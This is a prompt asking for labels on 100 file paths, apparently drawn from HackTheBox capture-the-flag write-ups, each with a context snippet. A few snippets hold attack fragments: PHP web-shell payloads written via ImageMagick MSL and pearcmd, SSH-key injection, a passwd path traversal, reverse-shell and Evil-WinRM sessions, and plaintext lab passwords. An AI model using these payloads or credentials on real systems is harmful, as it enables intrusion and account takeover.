Label these 100 paths (chunk 14/15).
Reply with one jsonl code block, one record per path, in input order.

1. /file.era.htb/upload.php
   context: file.era.htb/assets => http://file.era.htb/assets/ 302      GET        0l        0w        0c http://file.era.htb/upload.php => login.php 301      GET        7l       12w      178c http://file.era.htb
2. /js/app.js
   context: /js/app.js
3. /home/hish
   context: /home/hish
4. /var/www/html/intentions/storage/app/public/0xdf.php
   context: 8"?> <image> <read filename="caption:&lt;?php system($_GET['cmd']); ?&gt;" /> <write filename="info:/var/www/html/intentions/storage/app/public/0xdf.php" /> </image>
5. C:\Users\drbrown.HOSPITAL\Downloads\%filename%
   context: redential $c -ScriptBlock { cmd.exe /c "C:\Program` Files\gs\gs10.01.1\bin\gswin64c.exe" -dNOSAFER "C:\Users\drbrown.HOSPITAL\Downloads\%filename%" }"
6. /tmp/shell.php
   context: fig-create+/&locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system($_REQUEST[0]);?>+/tmp/shell.php' CONFIGURATION (CHANNEL PEAR.PHP.NET): ===================================== Auto-dis
7. /root/.local/bin/pyinstaller
   context: if [[ $ext == 'py' ]] ; then     /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null     /root/.local/bin/pyinstaller -F --name "qreader" $name --specpath /tmp    /usr/bin/mv ./dist ./build 
8. /var/www/.cache/google-chrome-for-testing/Default/Cache/old_Cache_Data_041
   context: file or directory (2) [2415:2418:0309/174909.483621:VERBOSE1:file_util_posix.cc(315)] Cannot stat "/var/www/.cache/google-chrome-for-testing/Default/Cache/old_Cache_Data_041": No such file or director
9. /opt/backups/current/pg_logical
   context: base /opt/backups/current/global /opt/backups/current/pg_commit_ts /opt/backups/current/pg_dynshmem /opt/backups/current/pg_logical /opt/backups/current/pg_multixact /opt/backups/current/pg_notify /op
10. /root/TeamCity/buildAgent/lib/jdk-searcher.jar
   context: r:/root/TeamCity/buildAgent/lib/agent-launcher.jar:/root/TeamCity/buildAgent/lib/spring-aspects.jar:/root/TeamCity/buildAgent/lib/jdk-searcher.jar:/root/TeamCity/buildAgent/lib/mxparser.jar:/root/Team
11. /usr/local/lib/python3.10/dist-packages/git/cmd.py
   context: ython3.10/dist-packages/git/util.py", line 419, in finalize_process     proc.wait(**kwargs)   File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait     raise GitCommandError(rem
12. C:\Windows\SysWOW64\Tasks
   context: WOW64\FxsTmp:*" /><FilePathCondition Path="C:\Windows\SysWOW64\FxsTmp\*" /><FilePathCondition Path="C:\Windows\SysWOW64\Tasks:*" /><FilePathCondition Path="C:\Windows\SysWOW64\Tasks\*" /><FilePathCond
13. C:\Users\winrm_user\Desktop
   context: *Evil-WinRM* PS C:\Users\winrm_user\Desktop> type user.txt b3fb6413************************
14. C:\Users\bb.morgan\Desktop\internal.pdf
   context: bb.morgan\Desktop> download internal.pdf                                          Info: Downloading C:\Users\bb.morgan\Desktop\internal.pdf to internal.pdf                                          Inf
15. /media/sf_CTFs/hackthebox/infiltrator-10.10.11.31/ping_test.bat
   context: *Evil-WinRM* PS C:\programdata> upload ping_test.bat  Info: Uploading /media/sf_CTFs/hackthebox/infiltrator-10.10.11.31/ping_test.bat to C:\programdata\ping_test.bat  Data: 28 bytes of 28 bytes copied
16. C:\WINDOWS\helpdesk.exe
   context: ntrolSet\services | Get-ItemProperty | Select-Object ImagePath | Select-String helpdesk @{ImagePath=C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs}
17. /dev/shm/fileread/apache2.conf
   context: /dev/shm/fileread/apache2.conf
18. /titanic.htb/static/assets/images/entertainment.jpg
   context: c http://titanic.htb/static/assets/images/home.jpg 200      GET      890l     5324w   534018c http://titanic.htb/static/assets/images/entertainment.jpg 200      GET     2986l     7000w   469100c http:
19. C:\Users\dallon.matrix\desktop
   context: PS C:\Users\dallon.matrix\desktop> cat user.txt 409d782a************************
20. /source/home/marcus
   context: /source/home/marcus
21. \\r\ndir\r\ndel
   context: e -DisableIntrusionPreventionSystem $true\' \r\ndir\r\ncd \\windows\\takss\r\ncd C:\\windows\\Tasks\\\r\ndir\r\ndel *\r\ndir\r\ncd \\\r\ndir\r\ncd users\r\ncd .\\Administrator\\Desktop\\\r\nnotepad cl
22. /usr/bin/tr
   context: h-checker$ cat check-leak.sh  #!/bin/bash source `dirname $0`/.env USER_NAME=$(/usr/bin/echo "$1" | /usr/bin/tr -dc '[:alnum:]') /opt/hash-checker/check_leak "$USER_NAME"
23. /home/oxdf/.nxc/logs/INVENTORY_10.129.234.176_2025-08-08_114658_bloodhound.zip
   context: Y        Done in 0M 20S LDAP        10.129.234.176  389    INVENTORY        Compressing output into /home/oxdf/.nxc/logs/INVENTORY_10.129.234.176_2025-08-08_114658_bloodhound.zip
24. /documentation/changelog.html
   context: /documentation/changelog.html
25. /portal.guardian.htb/static/vendor/tailwindcss/tailwind.min.css
   context: nt => http://portal.guardian.htb/includes/student/ 200      GET        1l    30245w  2934019c http://portal.guardian.htb/static/vendor/tailwindcss/tailwind.min.css 200      GET       27l       51w    
26. C:\_admin\profiles.xml
   context: PS C:\> copy C:\_admin\profiles.xml C:\Users\kioskUser0\Downloads\
27. /pilgrimage.htb/assets/images/news6.php
   context: 0w      153c http://pilgrimage.htb/landing-page-4 404      GET        0l        0w      153c http://pilgrimage.htb/assets/images/news6.php 404      GET        0l        0w      153c http://pilgrimage.
28. /tmp/tmpv5gne53tprintgen
   context: erating PostScript file...  Generating PDF (until the printer gets fixed...) Documents available in /tmp/tmpv5gne53tprintgen
29. C:\Users\Rose.L\Documents
   context: ersity.htb  Evil-WinRM shell v3.7  Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Rose.L\Documents>
30. /var/www/html/portal
   context: www-data@3c371615b7aa:/var/www/html/portal$ ls 404.html          build             index.php       privacy_policy.html about.html        class
31. C:/full/path/to/sqlite.db
   context: olute path (Linux): 'sqlite:////full/path/to/sqlite.db?mode=0646' //       or (Windows): 'sqlite:///C:/full/path/to/sqlite.db' $config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube'
32. Z:\hackthebox\visual-10.10.11.234
   context: PS Z:\hackthebox\visual-10.10.11.234 > .\Hello0xdf.exe Hello, 0xdf!
33. C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_2896_740_2.dll
   context: PS C:\Users\ldapreader\Desktop> .\Perfusion.exe -c cmd -i [*] Created Performance DLL: C:\Users\LDAPRE~1\AppData\Local\Temp\2\performance_2896_740_2.dll [*] Created Performance registry key. [*] Trigg
34. /usr/local/lib/python3.8/dist-packages/impacket/smb3structs.py
   context: ket/smb3.py", line 923, in login     if ans.isValidAnswer(STATUS_MORE_PROCESSING_REQUIRED):   File "/usr/local/lib/python3.8/dist-packages/impacket/smb3structs.py", line 458, in isValidAnswer     rais
35. /opt/internal_apps/clone_changes
   context: #!/usr/bin/python3  import os import sys from git import Repo  os.chdir('/opt/internal_apps/clone_changes')  url_to_clone = sys.argv[1]  r = Repo.init('', bare=True) r.clone_from(url_to_clone, 'new_ch
36. /home/dan_smith/.ssh
   context: import os  os.makedirs("/home/dan_smith/.ssh", exist_ok=True) f=open("/home/dan_smith/.ssh/authorized_keys", "a") f.write("ssh-ed25519 AAAAC3Nza
37. /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt
   context: oxdf@hacky$ ffuf -u http://10.10.11.199:8080/v1/AUTH_andrew/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -mc all -ac          /'___\  /'___\           /'___\        /\ \__/ /\ \__
38. /portal.guardian.htb/models/User.php
   context: eports.php => http://portal.guardian.htb/login.php 200      GET        0l        0w        0c http://portal.guardian.htb/models/User.php 301      GET        9l       28w      338c http://portal.guardi
39. C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\21FDFAAFC1D0
   context: SYSVOL\domain\scripts\A32FF3AEAA23 RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\113EB3B0B2D3 RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\21FDFAAFC1D0 RW C:\Windows\SYSVOL\domain\scripts\A32FF
40. /etc/ssh/ssh_host_dsa_key-cert.pub
   context: t_ecdsa_key HostKey /etc/ssh/ssh_host_rsa_key HostKey /etc/ssh/ssh_host_ed25519_key HostCertificate /etc/ssh/ssh_host_dsa_key-cert.pub HostCertificate /etc/ssh/ssh_host_ecdsa_key-cert.pub HostCertific
41. /etc/systemd/system/npcd.service
   context: tem/multi-user.target.wants/nagios.service /etc/systemd/system/multi-user.target.wants/npcd.service /etc/systemd/system/npcd.service /etc/systemd/system/multi-user.target.wants/snmptt.service /etc/sys
42. /routes/web.php
   context: jean@extension:~/projects/laravel-app$ grep -ri validateemail . ./routes/web.php:    Route::post('/management/validate', 'App\Http\Controllers\AdminController@validateEmail')->name
43. /tmp/Crashpad
   context: /google/chrome/chrome_crashpad_handler --monitor-self-annota tion=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation =lsb-re
44. C:\Windows\System32\Tasks_Migrated
   context: ystem32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader\*" /><FilePathCondition Path="C:\Windows\System32\Tasks_Migrated:*" /><FilePathCondition Path="C:\Windows\System32\Tasks_Migrated\
45. /host_root/Users/Administrator/Desktop
   context: root@900987cc8b26:/host_root/Users/Administrator/Desktop# cat root.txt eda0f688************************
46. C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\
   context: ondition Path="C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter:*" /><FilePathCondition Path="C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\*" /><FilePathCondition Path="C:         \Win
47. C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500
   context: evil-winrm-py PS C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500> ls -force      Directory: C:\Users\Administrator\AppData\Roaming\Microsoft\Prot
48. /eforenzics.htb/assets/imgs/avatar1.jpg
   context: s.htb/assets/vendors/bootstrap/bootstrap.bundle.js 200      GET       61l      353w    29810c http://eforenzics.htb/assets/imgs/avatar1.jpg 301      GET        9l       28w      322c http://eforenzics
49. /../../../../../../../../etc/passwd
   context: > {"ReadOrder":"../../../../../../../../../etc/passwd"} < {   "UserId": 0,   "Session": "Unauthorized",   "Time": "1:54:46",   "RemoveOrder": null,   "Wr
50. /opt/playbooks/inventory.ini
   context: stdlib.h> #include <string.h> #include <dirent.h> #include <openssl/md5.h>  #define INVENTORY_FILE "/opt/playbooks/inventory.ini" #define PLAYBOOK_LOCATION "/opt/playbooks/" #define ANSIBLE_PLAYBOOK_B
51. /home/developer/app/app.py
   context: acky$ curl -o- -s http://bagel.htb:8000/?page=../../../../proc/self/cmdline | tr '\000' ' ' python3 /home/developer/app/app.py
52. /opt/shared/dist
   context: [ $action == 'build' ]]; then   if [[ $ext == 'spec' ]] ; then     /usr/bin/rm -r /opt/shared/build /opt/shared/dist 2>/dev/null     /home/svc/.local/bin/pyinstaller $name     /usr/bin/mv ./dist ./bui
53. C:\Users\Administrator\Desktop
   context: evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt f263ec97************************
54. /var/spool/news
   context: 7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:
55. /root/TeamCity/webapps/ROOT/WEB-INF/plugins/Maven2/server/maven-resolver-api-1.6.3.jar
   context: settings-3.8.6.jar:/root/TeamCity/webapps/ROOT/WEB-INF/plugins/Maven2/server/maven-compat-3.8.6.jar:/root/TeamCity/webapps/ROOT/WEB-INF/plugins/Maven2/server/maven-resolver-api-1.6.3.jar:/root/TeamCit
56. C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\3DACA30B03D1
   context: \scripts\A32FF3AEAA23\2BECF3DC0B3D RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\2F3FCC01E0A3 RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\3DACA30B03D1 RW C:\Windows\SYSVOL\domain\scripts\A32FF
57. C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\113EB3B0B2D3\0EEB3FED3C10\3A3ED3232FEB
   context: 0A11ABB0 RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\113EB3B0B2D3\0EEB3FED3C10\0BF00013FEFE RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\113EB3B0B2D3\0EEB3FED3C10\3A3ED3232FEB RW C:\Windows\S
58. C:\Users\svc_sspr\Documents
   context: |_|   |__/  v1.4.1  [*] Connecting to 'dc.phantom.vl:5985' as 'svc_sspr' evil-winrm-py PS C:\Users\svc_sspr\Documents>
59. /mnt/Administrator/Documents
   context: 4 /mnt/Administrator 1688849860264767      1 drwx------   2 nobody   nogroup        64 Sep 15  2024 /mnt/Administrator/Documents find: ‘/mnt/Administrator/Documents’: Permission denied 168884986026478
60. /furni.htb/actuator/env/home
   context: 1l        1w     2129c http://furni.htb/actuator 200      GET        1l       11w      668c http://furni.htb/actuator/env/home 200      GET      549l     1497w    18854c http://furni.htb/ 404      GET
61. /nocturnal.htb/dashboard.php
   context: urnal.htb/backups => http://nocturnal.htb/backups/ 302      GET        0l        0w        0c http://nocturnal.htb/dashboard.php => login.php 403      GET        7l       10w      162c http://nocturna
62. /etc/varnish/secret
   context: 81 \               -T localhost:6082 \               -f /etc/varnish/default.vcl \               -S /etc/varnish/secret \               -s malloc,256m \               -p feature=+http2     ExecReload=
63. C:\snort\etc
   context: C:\snort\etc
64. C:\Windows\system32
   context: cky$ rlwrap -cAr nc -lnvp 443 Listening on 0.0.0.0 443 Connection received on 10.129.5.34 62791  PS C:\Windows\system32>
65. C:\Windows\SYSVOL\sysvol\baby2.vl\scripts
   context: Relative path: ..\..\..\Windows\SYSVOL\sysvol\baby2.vl\scripts\login.vbs       Working directory: C:\Windows\SYSVOL\sysvol\baby2.vl\scripts     EXTRA:       SPECIAL FOLDER LOCATION BLOCK:          Siz
66. /etc/needrestart/conf.d
   context: status OK) # $nrconf{'nagios-status'}->{sessions} = 0;   # Read additional config snippets. if(-d q(/etc/needrestart/conf.d)) {       foreach my $fn (sort </etc/needrestart/conf.d/*.conf>) {          
67. /home/oxdf/.sqlmap/output/checkout.shared.htb
   context: -end DBMS: MySQL > 5.0.12 (MariaDB fork) [13:21:27] [INFO] fetched data logged to text files under '/home/oxdf/.sqlmap/output/checkout.shared.htb'  [*] ending @ 13:21:27 /2022-08-12/
68. /dev/shm/0xdf_was_here.txt
   context: emily@pilgrimage:~$ echo "test" > /dev/shm/0xdf_was_here.txt
69. /tmp/output.txt
   context: frank@bookworm:/home/neil/converter/calibre$ ln -s /tmp/output /tmp/output.txt frank@bookworm:/home/neil/converter/calibre$ ./ebook-convert /tmp/test.txt /tmp/output.txt  1% Conv
70. C:\Users\WAO\Documents
   context: evil-winrm-py PS C:\Users\WAO\Documents> ipconfig  Windows IP Configuration  Ethernet adapter vEthernet (Internal-VSwitch1):     Connection
71. /home/bean/Documents/backup_tmp/bean_backup.tar.gz
   context: ocuments/backup_tmp cd /home/bean tar --exclude='.npm' --exclude='.cache' --exclude='.vscode' -czvf /home/bean/Documents/backup_tmp/bean_backup.tar.gz . date > /home/bean/Documents/backup_tmp/time.txt
72. C:\Users\sam.emerson\Documents
   context: C:\Users\sam.emerson\Documents> dir  Volume in drive C has no label.  Volume Serial Number is C009-0DB2   Directory of C:\Users\sa
73. /opt/Responder/Responder.py
   context: oxdf@hacky$ sudo uv run /opt/Responder/Responder.py -I tun0 ...[snip]... [MSSQL] Cleartext Client   : 10.129.244.81 [MSSQL] Cleartext Hostname : SQL07
74. C:\programdata\rev.bat
   context: mdata> upload rev.bat  Info: Uploading /media/sf_CTFs/hackthebox/infiltrator-10.10.11.31/rev.bat to C:\programdata\rev.bat  Data: 1796 bytes of 1796 bytes copied  Info: Upload successful!
75. /usr/local/lib/python3.8/dist-packages/sklearn/utils/validation.py
   context: ckages/sklearn/base.py", line 421, in _validate_data     X = check_array(X, **check_params)   File "/usr/local/lib/python3.8/dist-packages/sklearn/utils/validation.py", line 63, in inner_f     return 
76. \\system\r\n
   context: yaml query "SELECT * FROM execve(argv=['powershell','-c','whoami'])"  [  {   "Stdout": "nt authority\\system\r\n",   "Stderr": "",   "ReturnCode": 0,   "Complete": true  } ]
77. /var/log/cloud-init-output.log
   context: /var/log/mail.log /var/log/mail.log.1 /var/log/syslog.3.gz /var/log/cloud-init.log /var/log/syslog /var/log/cloud-init-output.log /var/log/auth.log /var/spool/rsyslog /etc/hostname /etc/cloud/cloud.cf
78. /usr/bin/md5sum
   context: to-script>" # sigs[2]="<md5sum>"  elems=${#scripts[@]}  for (( j=0; j<${elems}; j++ )) ; do   sig=$(/usr/bin/md5sum ${scripts[$j]} | awk '{print $1}')   if [[ "x$sig" == "x${sigs[$j]}" ]] ; then     #
79. /usr/lib/php/20220809
   context: /usr/lib/php/20220809
80. /root/TeamCity/buildAgent/lib/buildAgent-updates-applying.jar
   context: City/buildAgent/lib/jackson-module-jaxb-annotations.jar:/root/TeamCity/buildAgent/lib/slf4j-api.jar:/root/TeamCity/buildAgent/lib/buildAgent-updates-applying.jar:/root/TeamCity/buildAgent/lib/server-d
81. /absolute.htb/css/owl.carousel.min.css
   context: http://absolute.htb/js => http://absolute.htb/js/ 200      GET        6l       77w     3351c http://absolute.htb/css/owl.carousel.min.css 301      GET        2l       10w      150c http://absolute.htb
82. /etc/os-release
   context: wwwrun@pterodactyl:/> cat /etc/os-release  NAME="openSUSE Leap" VERSION="15.6" ID="opensuse-leap" ID_LIKE="suse opensuse" VERSION_ID="15.6" P
83. /home/guests/brody.wiza
   context: to=tcp,timeo=600,retrans=2,sec=sys,clientaddr=10.9.0.4,local_lock=none,addr=10.9.0.1) corporate.htb:/home/guests/brody.wiza on /home/guests/brody.wiza type nfs4 (rw,relatime,vers=4.2,rsize=524288,wsiz
84. C:\Users\mssqlsvc\Desktop\user.txt
   context: SQL (SIGNED\Administrator  dbo@master)> xp_cmdshell "type C:\Users\mssqlsvc\Desktop\user.txt" output                              --------------------------------    3d5747bd******************
85. /root/TeamCity/webapps/ROOT/WEB-INF/plugins/Maven2/server/maven-plugin-api-3.8.6.jar
   context: t-0.3.5.jar:/root/TeamCity/webapps/ROOT/WEB-INF/plugins/Maven2/server/maven-resolver-util-1.6.3.jar:/root/TeamCity/webapps/ROOT/WEB-INF/plugins/Maven2/server/maven-plugin-api-3.8.6.jar:/root/TeamCity/
86. /preprod-marketing.trick.htb/index.php
   context: http://preprod-marketing.trick.htb/index.php?page=contact.html
87. /home/phil/.ssh/id_rsa
   context: /home/phil/.ssh/id_rsa
88. C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\23010E0A1A33
   context: \scripts\A32FF3AEAA23\113EB3B0B2D3 RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\21FDFAAFC1D0 RW C:\Windows\SYSVOL\domain\scripts\A32FF3AEAA23\23010E0A1A33 RW C:\Windows\SYSVOL\domain\scripts\A32FF
89. /stocker.htb/js/bootstrap.bundle.min.js
   context: 9226c http://stocker.htb/img/apple-touch-icon.png 200      GET        7l     1222w    79742c http://stocker.htb/js/bootstrap.bundle.min.js 200      GET       12l       62w     3907c http://stocker.htb
90. C:\Users\sql_svc\Documents
   context: 234ronnie  Evil-WinRM shell v3.4  Info: Establishing connection to remote endpoint  *Evil-WinRM* PS C:\Users\sql_svc\Documents>
91. /usr/bin/base64
   context: in /usr/bin/python3,/usr/local/bin/gpg,/bin/bash,/usr/bin/flask,/usr/local/sbin/gpg,/usr/bin/groups,/usr/bin/base64,/usr/bin/lesspipe,/usr/bin/basename,/usr/bin/filename,/usr/bin/bash,/bin/sh,/usr/bin
92. /etc/ld.so.preload
   context: /etc/ld.so.preload
93. /Furni/target/surefire-reports/com.eureka.Furni.FurniApplicationTests.txt
   context: nore)$' ./Furni/target/maven-archiver/pom.properties ./Furni/target/classes/application.properties ./Furni/target/surefire-reports/com.eureka.Furni.FurniApplicationTests.txt ./Furni/target/surefire-re
94. /home/sergej/HardHatC2/TeamServer/bin/Release/net7.0/TeamServer
   context: amServer --configuration Release sergej      6979  2.1  3.3 274203412 131524 ?    Sl   16:00   0:08 /home/sergej/HardHatC2/TeamServer/bin/Release/net7.0/TeamServer sergej      6992  1.2  3.2 274195036
95. C:\Windows\ImmersiveControlPanel
   context: 50272 Microsoft Windows [Version 10.0.22000.1761] (c) Microsoft Corporation. All rights reserved.  C:\Windows\ImmersiveControlPanel>
96. /absolute.htb/js/bootstrap.min.js
   context: //absolute.htb/Fonts => http://absolute.htb/Fonts/ 200      GET        7l      689w    63240c http://absolute.htb/js/bootstrap.min.js 200      GET        2l     1283w    86926c http://absolute.htb/js/
97. C:\Users\btables\AppData\Local\Temp\SDIAG_b1b9b992-ddf0-4e8b-a9b9-555eab77e488
   context: 0 49804 Microsoft Windows [Version 10.0.19043.928] (c) Microsoft Corporation. All rights reserved.  C:\Users\btables\AppData\Local\Temp\SDIAG_b1b9b992-ddf0-4e8b-a9b9-555eab77e488>
98. /usr/bin/filename
   context: r/bin/flask,/usr/local/sbin/gpg,/usr/bin/groups,/usr/bin/base64,/usr/bin/lesspipe,/usr/bin/basename,/usr/bin/filename,/usr/bin/bash,/bin/sh,/usr/bin/ls,/usr/bin/cat,/usr/bin/id,/usr/local/libexec/scda
99. C:\Windows\Temp\hygiene.ps1
   context: ent process command line: powershell.exe  -NoProfile -NonInteractive -ExecutionPolicy Bypass -File "C:\Windows\Temp\hygiene.ps1" -TargetAdmin Administrator -pass ReinhardHammer507 -TargetUser sqlmgmt 
100. C:\Users\Administrator\HTB-Stability.exe
   context: "C:\Users\Administrator\Docume... HTB-Stability                                     SYSTEM          C:\Users\Administrator\HTB-Stability.exe restore .NET Framework NGEN v4.0.30319                    S
